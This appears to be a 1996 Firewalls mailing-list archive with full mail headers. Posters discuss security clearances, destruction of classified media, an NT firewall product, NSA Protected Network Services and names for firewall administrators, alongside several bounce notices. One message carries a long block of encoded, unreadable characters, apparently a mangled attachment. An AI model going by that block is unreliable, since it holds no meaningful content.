Unless maybe you/he WANT him arrested.... > > Or maybe he was just spinning a tale and you fell for it. Or maybe he > just didn't understand how it was working. 1) I was NOT spinning a tale 2) I DON'T want my father arrested (for WHAT? Pray tell?) 3) I never mentioned that classified info was sent over the net. Read more carefully before making assumptions. As I stated in my follow-ups (which really should not have even been necessary. C'mon some of you assume and infer WAY too much!!!!) I said that he had top secret clearance. I said that the company that he worked for (a DoD subcontractor) kept in touch w/ its other offices over the net. I said that they did not use encryption. I inferred that netcom was not secure. I said that I was not allowed to know his email address (company policy) (that's why I got him one plus a butload of software for Christmas a year ago).
Now, please show me where I stated that he or his company did, in fact, send ANY classified documents over the net! Guess what? You can't! Cause I never said that! You just assumed that that was what I meant. I said in follow-up posts that it was, in fact, possible for someone to perhaps mention something by accident (BTW, I never said that that did happen, I just mentioned that the possibility was there) just like that OTHER poster had mentioned. I alluded to the fact that *I* thought that the mere possibility of someone inadvertently saying something was there, and that I thought that in and of itself was insecure. I thought that they should have had NO net connection, at least in the capacity that they did have it. My point was that security is NOT the first thing on everyone's mind, even when it sometimes should be. Now, take these posts and try to get him arrested. Let me know when the lawyers stop laughing at the evidence that you present because it is comprised purely of assumptions and conjecture (and any other redundancies that you can think of). I don't mean for these comments to sound snide, but c'mon. Get real, and stop interpreting what you THINK someone said, especially when you say such inane things as "unless you/he WANT him arrested"!!!! Sorry about the bandwidth on this one. I consider this issue dead because of what it has become, and how many completely missed my point to begin with (though not all).
Chuckling in amazement, Brain21 From firewalls-owner Thu Jan 11 23:29:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA01047 for firewalls-outgoing; Thu, 11 Jan 1996 23:22:00 -0800 (PST) Received: from myall.awadi.com.au (myall.awadi.com.AU [150.207.2.65]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id XAA01035 for ; Thu, 11 Jan 1996 23:21:55 -0800 (PST) Received: from bunya.awadi ([150.207.2.63]) by myall.awadi.com.au (8.7.1/8.7.1) with SMTP id RAA27733; Fri, 12 Jan 1996 17:50:50 +1030 (CST) Received: from mallee.awadi by bunya.awadi (5.x/SMI-SVR4) id AA19380; Fri, 12 Jan 1996 17:50:47 +1030 From: blymn@awadi.com.au (Brett Lymn) Message-Id: <9601120720.AA19380@bunya.awadi> Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) To: bens@archimedes.vislab.navy.mil (Benjamin Allan Smith) Date: Fri, 12 Jan 1996 17:50:48 +1030 (CST) Cc: firewalls@greatcircle.com In-Reply-To: <199601120633.WAA24634@archimedes.vislab.navy.mil> from "Benjamin Allan Smith" at Jan 11, 96 10:32:55 pm X-Mailer: ELM [version 2.4 PL2] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to Benjamin Allan Smith: > > If memory serves, magnetic media that have had Secret data on them >may be declassified after 10 writes. Magnetic media with Top Secret and >higher may never be declassified and must be destroyed by physically >destroying the media (shredding) and incinerating the pieces. > if there was a firewalls FAQ this one should definitely be in it. The correct answer is, apparently, it depends. It seems in the US that the the DOD will allow the defence organisations to declassify and dispose of disks which have had data lower than a certain level stored on them (I think Secret is about right).
The rules for a Defence contractor are different - any media with any sort of classified data on it must be destroyed after it is no longer required. Here in Australia, I know for sure that it is the same for defence contractors - I am the ISSO so I am supposed to know about such things... > (Ironically I was able to easily find "Destruction of Equipment [Land >Rover] to Prevent Enemy Use" which is USER HANDBOOK, Truck, Utility, 3/4 Ton, >4 X 4 (Military 109) Pub. 3/82, Section V, Par 402 to 411) :) > I saw a section about changing the tyre on a military vehicle, the amount of detail and instruction in it was very very disturbing.... -- Brett Lymn, Computer Systems Administrator, AWA Defence Industries =============================================================================== "Upgrading your memory gives you MORE RAM!" - ad in MacWAREHOUSE catalogue. From firewalls-owner Thu Jan 11 23:50:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA01839 for firewalls-outgoing; Thu, 11 Jan 1996 23:32:29 -0800 (PST) Received: from ccigate.cci.de (ccigate.cci.de [193.103.165.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id XAA01817 for ; Thu, 11 Jan 1996 23:32:13 -0800 (PST) Received: by ccigate.cci.de (4.1/04-otm) id AA12187; Fri Jan 12 08:36:26 1996 Received: from thor.cci.de(194.173.165.240) by ccigate.cci.de via smap (V1.3) id sma012185; Fri Jan 12 08:36:08 1996 Received: from luis.cci.de by thor.cci.de (4.1/VS-1.8) id AA02153; Fri, 12 Jan 96 08:29:51 +0100 Received: from LUIS/SpoolDir by luis.cci.de (Mercury 1.21); 12 Jan 96 08:33:45 +0100 Received: from SpoolDir by LUIS (Mercury 1.21); 12 Jan 96 08:33:21 +0100 From: "Erwin Schuermann" Organization: Competence Center Informatik GmbH To: Owen Davis Date: Fri, 12 Jan 1996 08:33:19 +0100 Subject: Re: NT Fire Wall Reply-To: schuerma@cci.de Cc: Firewalls@GreatCircle.com X-Mailer: Pegasus Mail for Windows (v2.23) Message-Id: <2245B60234A@luis.cci.de> Sender: 
firewalls-owner@GreatCircle.COM Precedence: bulk > From: Owen Davis > Subject: NT Fire Wall > To: Firewalls@GreatCircle.com > Date: Thu, 11 Jan 1996 11:39:26 -0500 (EST) > Hi, > > I, like many others, am giving NT a shot for some of my networking needs. Do you know of an excellent NT Firewall ? > > Thank you much in advance. > > Owen Davis > Try http://www.network-1.com/n1 for a fully functional copy of Firewall/Plus for NT. You can test it for two weeks Erwin Schuermann ------x \|#|/ o - -------------------------ooO( * )Ooo-------------------------------- Erwin Schuermann '~' Competence Center Informatik GmbH E-Mail : schuerma@cci.de Abt. IT-Sicherheit tel : (+49)5931-805 226 Lohberg 10 fax(personal) : (+49)5931-842 226 49716 Meppen, Germany fax(reception): (+49)5931-805 100 Visit our Homepage: http://www.cci.de/ "Murphy's Law always occurs at the wrong moment" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From firewalls-owner Thu Jan 11 23:59:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA03760 for firewalls-outgoing; Thu, 11 Jan 1996 23:55:43 -0800 (PST) Received: from sc2 (sc2.cais.com [205.252.26.151]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id XAA03745; Thu, 11 Jan 1996 23:55:35 -0800 (PST) Received: by sc2 with Microsoft Mail id <01BAE099.1468CAA0@sc2>; Fri, 12 Jan 1996 02:52:58 -0500 Message-ID: From: "Sudduth, Larry" To: "'Debbie Driesman'" , "firewalls-digest@GreatCircle.COM" , "Firewalls@GreatCircle.COM" Subject: RE: Firewalls-Digest V5 #2 Date: Fri, 12 Jan 1996 02:52:30 -0500 X-MS-Attachment: WINMAIL.DAT 0 00-00-1980 00:00 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Debbie Driesman wrote January 11, 1996 8:22 AM >Where can I get more information on PNS? I've tried a number of the web >search tools and they didn't find anything. >> responding to A. Padgett Peterson's message Tue, 2 Jan 1996 14:02:49 -0500 >>2) Sounds like you have dedicated lines. 
Have you considered requiring PNS >> (Protected Network Service) from the telco ? (May have a different name >> but should be available). With this your lines are isolated/protected >> from other trunks. A dedicated line is not at the same risk as the Internet >> and PNS is generally "good enough" for SBU (Sensitive but Unclassified) >> traffic. > >> When the idea was introduced a couple of years ago, it was to be >> approved by the NSA and was a part of the FTS contract. Dunno where it >> is now. Protected Network Services, telecommunications systems approved by NSA for the plain-text transmission of Sensitive but Unclassified U. S. Government information of U. S. Government Departments and Agencies, and their offerors, are described in the semi-annual NSA publication, "Information Systems Security Products and Services Catalogue." Previously the PNS sobriquet described carrier-guaranteed "copper-only" long haul transport (e.g., no microwave relay). Such protection was effective against foreign ELINT threats, but not much else. The focus of the PNS "program" and the number of offerors has significantly expanded in the last several years. Samples of the INFOSEC Catalogue can perhaps be cadged from NSA, Attn.: V211, 9800 Savage Road, Ft. Meade, MD 20755-6000. The GPO sells the catalogue singly and by subscription (two issues plus two supplements equals quarterly); call them at (202) 512-1800. -=-=-=-=-=-=-=-=-=-=-=-=-= SudduthLM@SecureC2.com
B ML""@"H2WP^0N 9RX*CR\L)A\G+Q[BY#X@&-!S< (@,N ;T",3T&P% MH" L4"A-_F$D\$7#+3 RX W0*@$",'TM0&$'@$D_2D]+7TQ18NIU,6%H"&!L M+1 M@"T@/G8+< M@`F!.(#L`5VG_+? MX00`17(%P$:S+2 K`O<[\ M@1G$O M(!4M`5$/4A]_4R],44Y3(# I\2S!1.!K_4;Q048-5X$M0" P+2 %0+\M\CVP M!X XD 0`3:!A!"#]+?))`C $D1' 6,]9WUKOOTQ1,E(L(5Y2*J!&T'('0/)L M)/ B9S(`+1 )\ A@&&=H(C- !;%30E4_3( &8 "!*Z LH51B56[>8PM@!! & MD"SQ*6#?8>]W8O],42S080W01D T)C[_:*]IOVK/3%$IX0.@+?)'\;TM,'=? MX0N +- $<'5.$+LM$@6@=0M0(. MP7DQD?\R,660)3!6$'$S.5%5$6T/]VX? M;R]D`G @$2R@5/$D\/\M\BPP75 R4G%"+3 T805 ^2W%1E0%\$>Q; $@8#L` M_D1$X%Z0(K I\U80=']UC_=VGTQ17F-W-"PV_R7!-#]W?0Q,KTVV;43@1D(KL00@ 4)$K.RW0C%\@D'FRC1+U,C1!9.%C(2$E M,#)52*#_+;%0406PD-(J$0VP!/(M@/\M$ N 7O03X!T0`' DL0,@N7C2<'4" M8(9E)3 B8%#7*U@3I 9"8PAQ="3PA %G<=&/]84F($,KD = ;]IG"E N9D"# M\65-\ A@WG-E42WR9'([\&(%$$B URJQDH@J0'((@BV9``K ]P!P$] M`2(% MH'?@G#$"(/]E4&9 && Y(1& 5-")E#C0_7G1*)D@-! E,'N!B? %`.]_T$72 M&- +8'E5T08`<>!_,= @%2NR<4(-P:&23])G+PMQ$\!F4I%@9P.@14SX24Y4 M+>$8T"N0A9%48K]>DH8P,<%.\!&PH-%4+@'?`A"6T 0@+<5DD`$9/4T7>0YB8*C.=41& < 0@51&_*D [02T03E-XT24P00) M0&XN.B!6,B42.7\R%-,9 -L"4P340_L'0P-QL0 M+3<@'-"EY4?\4$\Q<65 7_1&4:^%`)#O&]!E43)2>&%SE* $]"NR_BA-85>! MN# 'D0M0IH&Y$O^X,'?@5;"/Q$AQ!T $(+LAYP`@!)!E4"D[*C%E0"WB&TZ M7M$H`=!$D34Q,N<=(!S!K/TM/;[OOW6M=HQU9''0+?!,34"6LW!E0S(NA@&" M%1?Q``'#`````$ `.0``0*7LPN"Z`0(!1P`!````,P```&,]55,[83T@.W ] M4V5C=7)E0S([;#U0`#T``0````4```!213H@``````(!%#0! 
Fri, 12 Jan 1996 00:29:31 -0800 (PST) From: mulligan@future.incog.com Received: from future.incog.com by incog.com (SMI-8.6/94082501) id AAA21785; Fri, 12 Jan 1996 00:26:35 -0800 Received: from future by future.incog.com (SMI-8.6/SMI-SVR4) id BAA16461; Fri, 12 Jan 1996 01:28:27 -0700 Message-Id: <199601120828.BAA16461@future.incog.com> To: Kent Dahlgren cc: Brett Lymn , Brain21 , firewalls@greatcircle.COM Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) Reply-to: mulligan@incog.com In-reply-to: Your message of "Thu, 11 Jan 1996 07:30:42 PST." Date: Fri, 12 Jan 1996 01:28:26 -0700 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Kent Dahlgren wrote: > > According to Brain21: > > > > > >Hell, my father used > > >to do top secret work for the Dept. of Defense (he needed "Q" clearance, > > >and needs higher now) and the office where he worked communicated to its > > >other offices over the net. They used netcom. Not too terribly secure > > >if you ask me. They did not use encryption. > > [Brett Lymn's response removed] > I hold a TS SCI clearance with the Air Force. I've been in for almost 10 > years, and I've never heard of a "Q" clearance. Not to say there isn't > any such thing; I don't pretend to know everything. A "Q" clearance is a Department of Energy clearance and NOT a DOD clearance.
geoff From firewalls-owner Fri Jan 12 04:44:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA14676 for firewalls-outgoing; Fri, 12 Jan 1996 04:35:51 -0800 (PST) Received: from balder.ssds.com (balder.ssds.com [204.131.72.62]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA14671 for ; Fri, 12 Jan 1996 04:35:47 -0800 (PST) Received: (from mail@localhost) by balder.ssds.com (8.6.9/8.6.9.SSDSnet-hub) id FAA27111; Fri, 12 Jan 1996 05:34:49 -0700 Received: from denver(134.127.16.1) by balder via smap (V1.3) id sma027109; Fri Jan 12 05:34:41 1996 Received: from baltimore.ssds.com (baltimore.ssds.com [134.127.34.1]) by denver.ssds.com (8.6.9/8.6.9.SSDSnet-hub) with ESMTP id FAA28687; Fri, 12 Jan 1996 05:34:39 -0700 Received: (from mam@localhost) by baltimore.ssds.com (8.6.9/8.6.9.SSDSnet-site) id HAA28755; Fri, 12 Jan 1996 07:34:37 -0500 Date: Fri, 12 Jan 1996 07:34:36 -0500 (EST) From: Mike Malik -- Dover DE X-Sender: mam@baltimore To: "Marcus J. Ranum" cc: Firewalls@GreatCircle.COM Subject: Re: Firewalls-Digest V5 #16 In-Reply-To: <199601111500.KAA12166@switchblade.v-one.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Amen ! ( ( | ( Mike Malik (mam@ssds.com) ) ) (| ), inc. 
9841 Broken Land Parkway,Suite 100 business driven Columbia, MD 21046 technology solutions 410-381-4313 FAX: 410-381-2170 From firewalls-owner Fri Jan 12 04:59:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA14885 for firewalls-outgoing; Fri, 12 Jan 1996 04:51:24 -0800 (PST) Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id EAA14880 for ; Fri, 12 Jan 1996 04:51:20 -0800 (PST) Received: from clark.net (proberts@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id HAA11753; Fri, 12 Jan 1996 07:50:21 -0500 (EST) Received: (from proberts@localhost) by clark.net (8.7.1/8.7.1) id HAA00995; Fri, 12 Jan 1996 07:50:19 -0500 (EST) Date: Fri, 12 Jan 1996 07:50:19 -0500 (EST) From: "Paul D. Robertson" To: Bill Curr cc: firewalls@greatcircle.com Subject: Re: "Title for Firewall Admin? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 11 Jan 1996, Bill Curr wrote: > The mail administrator is "postmaster" This is covered in the SMTP RFC, and is a *requirement* of correctly implemented SMTP. > The web server admin is "webmaster" That's because the little weenies were jealous that postmasters got more than one ID. :P > Is there such a title for a firewall administrator? I think gatekeeper is in fairly widespread use, though most don't alias it at their mailhost, which I think would be helpful, given the lack of consistency in the INTERNIC WHOIS database. Internally, the firewall admins are known by much more colorful terms by their happy little Real Audio seeking users ;) > And is there a list of these colorful "nom de nets" anywhere? > -Thanks > Bill > Paul. ----------------------------------------------------------------------------- Paul D.
Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." PSB#9280 From firewalls-owner Fri Jan 12 05:14:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA15196 for firewalls-outgoing; Fri, 12 Jan 1996 05:02:53 -0800 (PST) Received: from erenj.com (ereapp.ERENJ.COM [159.70.31.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA15189 for ; Fri, 12 Jan 1996 05:02:48 -0800 (PST) Received: from eredns.erenj.com(159.70.1.252) by ereapp.erenj.com via smap (V1.3) id sma000901; Fri Jan 12 08:01:45 1996 Posted-Date: Fri, 12 Jan 1996 08:01:44 -0500 From: "Bryan D. Boyle" Message-Id: <9601120801.ZM8948@maverick.erenj.com> Date: Fri, 12 Jan 1996 08:01:43 -0500 In-Reply-To: "Marcus J. Ranum" "Re: Firewalls-Digest V5 #16" (Jan 11, 10:00am) References: <199601111500.KAA12166@switchblade.v-one.com> X-Phone: (908) 730-3338 X-Saying: Strange problems call for strange solutions. X-Face: "Pd&4kXWsi"3Hc_Y~I-ts24DN$w~Hh)&L-P9DZvE"~_~m),~Y&N_]TUIM*4.r@z$SxVL]}v=+IP>Fuq{zx%{KKj"Kys1Q5{|m*l}:[T;N:/=@5[xOIpR$%skp$f0#6^j\1+ -?l%Yk/+S8Y!3J@{~!Ao4-COV:Ft}{]oZ&1=!@<>UIh2s X-Mailer: Z-Mail (3.2.1 10apr95) To: firewalls@greatcircle.com Subject: Re: Firewalls-Digest V5 #16 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Jan 11, 10:00am, Marcus J. Ranum wrote: ******DELETIA******** > I suspect, but I don't know, that Tsutomu would probably > say something similar. The game of securing systems is correctly > balancing risks against technical responses to risk. If you can > convince yourself the risks are low, then the technical responses > required are also low. > > If you don't take the time to figure out what's at stake > you can't produce a measured, appropriate response. Truer words ne'er were passed on this list. 
We spend so much more time in the administrivia of 'mine is {bigger|faster|better} than yours' than we do in the 'what is the risk of providing a service, what is the analysis of the threat, and what is the level of security that we can live with to provide our customers (remember them???) a reasonable service in an auditable manner..." If you don't know what the objective is, it is pretty hard to design a system to help you get there. Just my $.02 -- Bryan D. Boyle | EMAIL: bdboyle@erenj.com 908-730-3338 #include | http://www.access.digex.net/~bdboyle/index.html "It is only the ignorant who suppose themselves omniscient." --General Robert Edward Lee-- From firewalls-owner Fri Jan 12 05:29:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA15223 for firewalls-outgoing; Fri, 12 Jan 1996 05:05:04 -0800 (PST) Received: from mail.Clark.Net (mail.clark.net [168.143.0.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id FAA15218 for ; Fri, 12 Jan 1996 05:05:01 -0800 (PST) Received: from clark.net (proberts@clark.net [168.143.0.7]) by mail.Clark.Net (8.7.3/8.6.5) with ESMTP id IAA12791; Fri, 12 Jan 1996 08:04:00 -0500 (EST) Received: (from proberts@localhost) by clark.net (8.7.1/8.7.1) id IAA03067; Fri, 12 Jan 1996 08:03:59 -0500 (EST) Date: Fri, 12 Jan 1996 08:03:58 -0500 (EST) From: "Paul D. Robertson" To: Brett Lymn cc: Benjamin Allan Smith , firewalls@GreatCircle.COM Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) In-Reply-To: <9601120720.AA19380@bunya.awadi> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 12 Jan 1996, Brett Lymn wrote: > According to Benjamin Allan Smith: > > > > If memory serves, magnetic media that have had Secret data on them > >may be declassified after 10 writes.
Magnetic media with Top Secret and > >higher may never be declassified and must be destroyed by physically > >destroying the media (shredding) and incinerating the pieces. > > > > if there was a firewalls FAQ this one should definitely be > in it. There is a FAQ, and I for one don't understand why Marcus hasn't gotten around to folklore, legends and stuff, what's he doing, working for a living? Sheesh ;) > > The correct answer is, apparently, it depends. It seems in the US > that the DOD will allow the defence organisations to declassify > and dispose of disks which have had data lower than a certain level > stored on them (I think Secret is about right). The rules for a Secret, and it's "used to allow" according to a couple of old acquaintances. > Defence contractor are different - any media with any sort of > classified data on it must be destroyed after it is no longer > required. > > Here in Australia, I know for sure that it is the same for defence > contractors - I am the ISSO so I am supposed to know about such > things... > > > > (Ironically I was able to easily find "Destruction of Equipment [Land > >Rover] to Prevent Enemy Use" which is USER HANDBOOK, Truck, Utility, 3/4 Ton, > >4 X 4 (Military 109) Pub. 3/82, Section V, Par 402 to 411) :) > > I'd consider an attempt at destroying a Land Rover to be a fairly significant feat without pyrotechnics or HE. > > I saw a section about changing the tyre on a military vehicle, the > amount of detail and instruction in it was very very disturbing.... > Written for the lowest common denominator. The old M-16 maintenance *comic book* was always a personal favorite of how far down one could stoop denominator-wise. Paul. ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact."
PSB#9280 From firewalls-owner Fri Jan 12 06:14:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA17120 for firewalls-outgoing; Fri, 12 Jan 1996 06:05:51 -0800 (PST) Received: from gmap-gw.leeds.ac.uk (gmap15.leeds.ac.uk [129.11.84.200]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id GAA17115 for ; Fri, 12 Jan 1996 06:05:36 -0800 (PST) Received: from gmap3 (gmap-mailhub.leeds.ac.uk [129.11.200.3]) by gmap-gw.leeds.ac.uk (8.7.3/8.6.9) with SMTP id OAA28176 for ; Fri, 12 Jan 1996 14:04:13 GMT Received: from gmap.leeds.ac.uk (dannyc@gmap124 [129.11.200.124]) by gmap3 (8.6.12/8.6.9) with SMTP id KAA17042 for ; Fri, 12 Jan 1996 10:11:23 GMT From: Danny Cox Date: Fri, 12 Jan 1996 10:10:16 GMT Message-Id: <9256.9601121010@gmap.leeds.ac.uk> X-Planation: X-Faces images can be viewed with the XFaces program To: firewalls@greatcircle.com Subject: Insecurity of Internet connections X-Sun-Charset: US-ASCII X-Face: (:_YnQcTM$q\Nl0.mYy:C'Y|(;&7.2m~Rc%xt: > I highly doubt that. Every machine that I have seen on base which has >Secret (or higher) data is not allowed to have *any* physical connection with >the internet (the mjr 100% sure firewall to the internet--cut the wires). This left me musing. The overall purpose of building firewalls between our internal networks and the Internet (or any other network) is to secure ourselves from compromise as best we can. There is a lot of twitchiness around about allowing Internet connections and I suspect that's in part simply driven by the media, who pick up cheerfully on stories of successfully compromised systems whether due to poor administration or bad initial configuration or weak security software or whatever. What I'm trying to get a feel for, and I'm struggling a little, is to what extent we can secure ourselves in the ideal world. When I hear people say that the Internet is insecure, and connecting to the Internet is an enormous security risk, I squirm.
If, as an absolute statement, those are true, then maybe we're wasting time here anyway. Assuming it's not, then what level of assurance can we offer to a non-techie sort of person. Does anyone have numbers to indicate what attacks are successful - a sort of top ten if you would? When the military refuse connections to the Internet - are they absolutely right because the Internet is insecure, or simply covering their backs (understandably) in case of something going amiss, which isn't known about currently ? They must achieve some sort of risk analysis in order to decide what underlying network topology is okay and what isn't, I assume. Anyone give some insight as to how this is done ? I don't feel that my words ask my question very precisely, but hopefully they might allow a bit of reading between lines to show what I'm getting at! Thanks for your thoughts, Danny From firewalls-owner Fri Jan 12 06:44:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA17929 for firewalls-outgoing; Fri, 12 Jan 1996 06:38:00 -0800 (PST) Received: from gauntlet-1.trusted.com (gauntlet-1.trusted.com [204.254.155.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA17915 for ; Fri, 12 Jan 1996 06:37:53 -0800 (PST) Received: by gauntlet-1.trusted.com; id JAA24204; Fri, 12 Jan 1996 09:39:36 -0500 Received: from vanidor.tis.com(192.94.214.98) by gauntlet-1.trusted.com via smap (T3.1) id xma024199; Fri, 12 Jan 96 09:39:10 -0500 Message-Id: <2.2.16.19960112143121.3f9720e2@gauntlet-1.trusted.com> X-Sender: avolio@gauntlet-1.trusted.com X-Mailer: Windows Eudora Pro Version 2.2 (16) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 12 Jan 1996 09:31:21 -0500 To: billcurr@cyberspace.com (Bill Curr), firewalls@GreatCircle.COM From: Frederick M Avolio Subject: Re: "Title for Firewall Admin?
Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On the Gauntlet Firewalls that we install, the management accounts of the firewall machine go to the firewall manager. But I can see, eventually, a need for a well known different term. Gee, another thing for the Firewall Product Developers Consortium to talk about. :-) Quick... get famous. Suggest a standard! "gatekeeper" is a fun possibility. "doorman" is too plain. Fred At 04:04 PM 1/11/96 -0800, Bill Curr wrote: > >The mail administrator is "postmaster" >The web server admin is "webmaster" >Is there such a title for a firewall administrator? >And is there a list of these colorful "nom de nets" anywhere? >-Thanks >Bill > > From firewalls-owner Fri Jan 12 07:29:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19544 for firewalls-outgoing; Fri, 12 Jan 1996 07:27:08 -0800 (PST) Received: from PCC.SSW.DHHS.GOV (ibm.pcc.dhhs.gov [192.73.61.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19536 for ; Fri, 12 Jan 1996 07:26:58 -0800 (PST) Received: from PHSSEA.SSW.DHHS.GOV by PCC.SSW.DHHS.GOV (Soft*Switch Central V4L380P7) id 675524100096012FPHSSEA; 12 Jan 1996 10:24:10 EST Message-Id: Date: 12 Jan 1996 10:24:10 EST From: "Administrator" Subject: Message not deliverable To: Firewalls@GREATCIRCLE.COM Comment: MEMO 01/12/96 10:22:00 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Status Distribution The message regarding "Firewalls-Digest V5 #21" sent on 1/12/96 1:01AM was addressed to the following invalid recipients. Robert Matson at ~PHSSEA Please consult your cc:Mail Administrator. 
From firewalls-owner Fri Jan 12 07:53:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19680 for firewalls-outgoing; Fri, 12 Jan 1996 07:30:24 -0800 (PST) Received: from PCC.SSW.DHHS.GOV (ibm.pcc.dhhs.gov [192.73.61.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19641 for ; Fri, 12 Jan 1996 07:30:06 -0800 (PST) Received: from PHSSEA.SSW.DHHS.GOV by PCC.SSW.DHHS.GOV (Soft*Switch Central V4L380P7) id 210228100096012FPHSSEA; 12 Jan 1996 10:28:10 EST Message-Id: Date: 12 Jan 1996 10:28:10 EST From: "Administrator" Subject: Message not deliverable To: Firewalls@GREATCIRCLE.COM Comment: MEMO 01/12/96 10:25:00 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Status Distribution The message regarding "Firewalls-Digest V5 #22" sent on 1/12/96 4:06AM was addressed to the following invalid recipients. Robert Matson at ~PHSSEA Please consult your cc:Mail Administrator. From firewalls-owner Fri Jan 12 07:59:16 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19678 for firewalls-outgoing; Fri, 12 Jan 1996 07:30:22 -0800 (PST) Received: from PCC.SSW.DHHS.GOV (ibm.pcc.dhhs.gov [192.73.61.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19644 for ; Fri, 12 Jan 1996 07:30:06 -0800 (PST) Received: from PHSSEA.SSW.DHHS.GOV by PCC.SSW.DHHS.GOV (Soft*Switch Central V4L380P7) id 431328100096012FPHSSEA; 12 Jan 1996 10:28:10 EST Message-Id: Date: 12 Jan 1996 10:28:10 EST From: "Administrator" Subject: Message not deliverable To: Firewalls@GREATCIRCLE.COM Comment: MEMO 01/12/96 10:25:00 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Status Distribution The message regarding "Firewalls-Digest V5 #22" sent on 1/12/96 4:06AM was addressed to the following invalid recipients. Robert Matson at ~PHSSEA Please consult your cc:Mail Administrator. 
From firewalls-owner Fri Jan 12 08:14:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA21346 for firewalls-outgoing; Fri, 12 Jan 1996 08:11:49 -0800 (PST) Received: from omega.IntraNet.com (omega.IntraNet.com [192.148.106.20]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA21309 for ; Fri, 12 Jan 1996 08:11:39 -0800 (PST) Received: by omega.IntraNet.com; (5.65/1.1.8.3/20May95-0100AM) id AA21611; Fri, 12 Jan 1996 11:17:21 -0500 Received: by giant.IntraNet.com (DECUS UUCP /2.0/2.0/2.0/); Fri, 12 Jan 96 11:02:44 EST Date: Fri, 12 Jan 96 11:02:44 EST Message-Id: <0099C465F6823600.4060064A@giant.IntraNet.com> From: "G. Del Merritt" Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura To: Firewalls@GreatCircle.COM X-Vms-Mail-To: uucp%"Firewalls@GreatCircle.COM" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In-response-to: 's message of 11 Jan 1996 07:30:42 >On Thu, 11 Jan 1996, Brett Lymn wrote: >> According to Brain21: >> >Hell, my father used >> >to do top secret work for the Dept. of Defense (he needed "Q" clearance, >> >and needs higher now) and the office where he worked communicated to its >> : >> Ummmm I suspect that things may be a bit different to that which you > : >I hold a TS SCI clearance with the Air Force. I've been in for almost 10 >years, and I've never heard of a "Q" clearance. Not to say there isn't >any such thing; I don't pretend to know everything. But classified traffic One of the points of SCI is that it is based on need to know. If you don't need to know about "Q", then you won't necessarily even know that it exists. And this is what you are told in the briefing process. So Cool. Now the world knows more about you all. This shows quite well that firewalls cannot contain sensitive information; only people can. Firewalls can at best just impede the flow.
